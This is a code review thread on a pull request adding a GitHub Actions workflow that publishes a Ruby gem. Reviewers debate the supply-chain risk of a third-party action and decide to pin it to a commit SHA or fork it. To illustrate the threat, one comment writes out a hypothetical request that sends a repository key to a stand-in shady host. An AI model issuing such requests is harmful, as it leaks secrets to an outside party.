.github/workflows/publish.yml

```diff
@@ -0,0 +1,22 @@
+name: Publish Gem
+
+on:
+  push:
+    branches:
+      - master
+jobs:
+  build:
+    runs-on: ubuntu-latest
+
+    steps:
+      - uses: actions/checkout@v2
+        with:
+          fetch-depth: 2
+
+
+      - name: Release Gem
+        uses: discourse/publish-rubygems-action@v2-beta
```

Comment:
@take-five do we have any policy about using github actions from 3rd party? 
Or is it better to at least do a fork?

Reply:
This also looks like some 3rd level fork, original repo is https://github.com/cadwallion/publish-rubygems-action. Or are there any reason not to use the original?

Reply:
Aren't most github actions 3rd party, assuming you mean 2nd party is Github? E.g. [this](https://github.com/ruby/setup-ruby) is what we use in the [ruby workflow](https://github.com/salemove/salestation/blob/master/.github/workflows/ruby.yml#L26). Can of course fork it either from the working version or directly from source an implement the fix myself. Whatever seems best.

Reply:
There is still a difference when it comes directly from `ruby` official repo then from some developer on the internet.

Reply:
I'd also be extra cautious here, because the action gets access to our secrets. But if there is a very good reason to use this particular fork, then let us know!

Reply:
The secrets aren't passed to the action directly, would be rather silly if they were, but the consensus seems to be to create a fork anyway, which seems reasonable, so I'll do that.

Reply:
> The secrets aren't passed to the action directly, would be rather silly if they were

The action does have access to credentials tho https://github.com/cadwallion/publish-rubygems-action/blob/master/entrypoint.sh#L7. If maintainer decides to send it somewhere now and updates the action then they could get hold of it.

Reply:
But the secrets are accessible to the action during the run. So if the owner of the action would update the action to make a request `GET www.some-shady-page.com/steal/gitKeys=[our_key_here]`.

Having our own fork is one way to ensure that this does not happen silently, but i think it is a bit of an overkill. A better alternative would be to **pin** the version number.

> We strongly recommend that you include the version of the action you are using by specifying a Git ref, SHA, or Docker tag number. If you don’t specify a version, it could break your workflows or cause unexpected behavior when the action owner publishes an update.
```
  # Reference a specific commit
  - uses: actions/checkout@a81bbbf8298c0fa03ea29cdc473d45769f953675
  # Reference the major version of a release
  - uses: actions/checkout@v2
  # Reference a specific version
  - uses: actions/checkout@v2.2.0
```
> Using the commit SHA of a released action version is the safest for stability and security.
Using the specific major action version allows you to receive critical fixes and security patches



Source: https://docs.github.com/en/actions/learn-github-actions/workflow-syntax-for-github-actions#jobsjob_idstepsuses

@ostap0207 do you think pinning the version would be enough? Then we would not have to own and maintain a fork, but we would still have control over what exact code is run in the pipeline.

Reply:
The version is already pinned, but I did also already fork the repo https://github.com/salemove/publish-rubygems-action. I'll just have to implement the fix that I chose the other fork for in the first place.

Reply:
The version is pinned to the tag currently, which can be overriden.

Reply:
> https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-third-party-actions

> Pin actions to a tag only if you trust the creator

> Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload.

So either pin to commit hash or fork. Either is fine with me as the action is quite small and maintenance shouldn't be a big issue. But I guess commit hash should be enough indeed.

Reply:
Updated. Pinned it to the last commit of the branch it was previously on.